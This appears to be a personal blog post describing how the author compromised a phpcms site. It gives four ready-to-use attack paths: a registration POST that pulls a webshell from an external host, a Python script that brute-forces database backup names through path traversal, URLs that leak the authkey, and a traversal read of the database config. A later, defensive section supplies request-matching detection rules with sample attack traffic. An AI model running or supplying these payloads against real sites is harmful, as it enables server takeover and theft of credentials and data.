phpcms notes
Author: Iamyc    Posted: 2019-02-20 0:18 (Wednesday)    Views: 1355

Just now in a group chat I happened to see someone post a site that had been hacked, asking for help.

Not that I'm after money; after days of nothing but code auditing my brain is probably a bit fried anyway, so taking a site for a change is fine.

So I helped take a look: the fingerprint was phpcms, and... well.

Then I decisively pulled out an exp and fired it off.

And told them where the hole was.

phpcms hasn't had any hot new vulnerabilities reported recently, so this is basically still the old site-taking playbook.

1. The top priority, of course, is a direct getshell

Send to /index.php?m=member&c=index&a=register&siteid=1

POST data:

siteid=1&modelid=11&username=yc&password=ycycyc11!!&email=yc@lang-v.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=

This is the well-known phpcms v9.6.0 front-end registration upload bug: the registration handler fetches the remote file referenced by the img src into uploadfile/, the trailing #.jpg gets a .php source past the extension check, and the response echoes the path where the file was stored. Check that path with a browser (or your webshell client) to confirm the shell landed.

2. Backup vulnerability

Python 2 exp script (also runs under Python 3); just change the url to your target. At the end, fetch the recovered backup from /caches/bakup/default/.


# coding=utf-8
# The api.php creatimg op takes a font path that is not sanitised for "..",
# and the trailing "<<" makes the font lookup behave as a prefix match. So a
# 200 response whose body is a PNG means some file under caches/bakup/default/
# starts with the prefix we supplied. That yes/no oracle is used to recover
# the backup file name one character at a time.
from __future__ import print_function
import itertools
import requests

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
url = "http://www.lang-v.com"  # exchange this url
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"


def exists(prefix):
    """Oracle: does some file in caches/bakup/default/ start with `prefix`?"""
    r = requests.get(url + payload.format(location=prefix))
    # The body is binary; check the PNG magic rather than searching text.
    return r.status_code == 200 and r.content.startswith(b"\x89PNG")


# Step 1: find a short prefix (1 to 6 chars) that matches anything at all.
backup_sql = ""
for num in range(1, 7):
    for pre in itertools.permutations(characters, num):
        pre = ''.join(pre)
        if exists(pre):
            backup_sql = pre
            break
    if backup_sql:
        break
print("[+]", backup_sql)

# Step 2: extend one character at a time. Every character in the alphabet is
# tried (the original skipped the last one); when none matches, the name is
# complete. 30 rounds is a hard upper bound on the name length.
for i in range(30):
    for ch in characters:
        if exists(backup_sql + ch):
            backup_sql += ch
            print("[+] ", backup_sql)
            break
    else:
        break
print(">>", backup_sql + ".sql")

3. Via the authkey
Two exps that obtain the authkey (both dump the phpsso application list, which carries the authkey shared between phpcms and phpsso_server; the second reads it straight out of the applist cache file):
/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V
/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
Once you have the authkey, go Baidu it yourself... one search turns up a pile of write-ups.

4. File include exp (the endpoint echoes the file back, so in practice it is an arbitrary file read; the path below pulls the database config, i.e. the DB credentials)
/index.php?m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php
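For the defending side, here is the detection logic for all four paths above (registration upload, backup-name probing, the two authkey reads, and the search file read) run over constructed sample requests. This is an added example, not code from the original post or from phpcms; the rule names, the client IPs, the attacker host and the sample requests are all made up for illustration, and the request tuples are in the shape you would get at a WAF or reverse proxy that can see POST bodies (an access log alone cannot distinguish a legitimate registration from the getshell one).

```python
"""Detection rules for the phpcms attack paths described above.

Added example, not part of the original post. Rule names, IPs, hosts and
the sample requests below are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus, urlparse, parse_qs


def _params(query):
    """Decode a query string or form body into {lower-case key: first value}."""
    return {k.lower(): v[0] for k, v in
            parse_qs(query, keep_blank_values=True).items()}


def _traversal(value):
    """True if the value climbs directories in either slash style.

    Decoded twice so a double-encoded %252e%252e%252f is still caught."""
    v = unquote_plus(unquote_plus(value)).lower()
    return "../" in v or "..\\" in v


def classify_request(method, uri, body=""):
    """Return the names of the rules one request trips (empty list = nothing)."""
    parsed = urlparse(uri)
    path = unquote_plus(parsed.path).lower()
    q = _params(parsed.query)
    form = _params(body) if body else {}
    hits = []

    # 1. Front-end registration whose info[content] carries an <img src=...>
    #    pointing at a .php file: the server fetches it into uploadfile/.
    if (method == "POST" and path.endswith("/index.php")
            and q.get("m") == "member" and q.get("a") == "register"):
        content = form.get("info[content]", "")
        if re.search(r"<img[^>]+src=\S*\.php", content, re.I):
            hits.append("register_remote_php_upload")

    # 2. Backup-name brute force: api.php op=creatimg with a font= path that
    #    traverses out of the fonts directory or aims at caches/bakup.
    if path.endswith("/api.php") and q.get("op") == "creatimg":
        font = q.get("font", "")
        if _traversal(font) or "bakup" in font.lower():
            hits.append("backup_name_probe")

    # 3a. phpsso getapplist: dumps the application list (carries the authkey).
    if ("phpsso_server" in path and q.get("m") == "phpsso"
            and q.get("a") == "getapplist"):
        hits.append("authkey_getapplist")

    # 3b. api.php get_menu with a cachefile= that traverses to the applist cache.
    if path.endswith("/api.php") and q.get("op") == "get_menu":
        cf = q.get("cachefile", "")
        if _traversal(cf) or "applist" in cf.lower():
            hits.append("authkey_cachefile_traversal")

    # 4. search public_get_suggest_keyword with q= climbing to a config file.
    if q.get("m") == "search" and q.get("a") == "public_get_suggest_keyword":
        if _traversal(q.get("q", "")):
            hits.append("search_file_read")
    return hits


# Constructed sample traffic: (client IP, method, URI, POST body).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "GET", "/index.php?m=content&c=index&a=lists&catid=6", ""),
    ("203.0.113.7", "POST", "/index.php?m=member&c=index&a=register&siteid=1",
     "siteid=1&modelid=11&username=yc&password=ycycyc11!!&email=yc@example.com"
     "&info[content]=<img src=http://attacker.example/shell.php#.jpg>"
     "&dosubmit=1&protocol="),
    ("203.0.113.7", "GET",
     "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/a<<", ""),
    ("203.0.113.7", "GET",
     "/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=XXXX", ""),
    ("203.0.113.7", "GET",
     "/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey"
     "&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin", ""),
    ("203.0.113.7", "GET",
     "/index.php?m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php", ""),
    ("10.0.0.9", "GET", "/index.php?m=search&a=public_get_suggest_keyword&q=phpcms", ""),
]


def scan(requests_):
    """Aggregate rule hits per client: {ip: sorted unique rule names}."""
    per_ip = {}
    for ip, method, uri, body in requests_:
        for rule in classify_request(method, uri, body):
            per_ip.setdefault(ip, set()).add(rule)
    return {ip: sorted(rules) for ip, rules in per_ip.items()}


if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_REQUESTS).items():
        print(ip, ", ".join(rules))
```

The rules key on the controller/action parameters rather than on literal attacker strings (txt=mochazz, callback=aaaaa), since those are trivially changed; the registration rule deliberately needs the form body, because the URL of a getshell attempt is identical to that of a normal sign-up.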



Post URL: http://lang-v.com/first_cms/yc/emlog/src/?post=67
Copyright: unless otherwise noted, this article is original content of "YC's Blog"; please keep the source when reposting.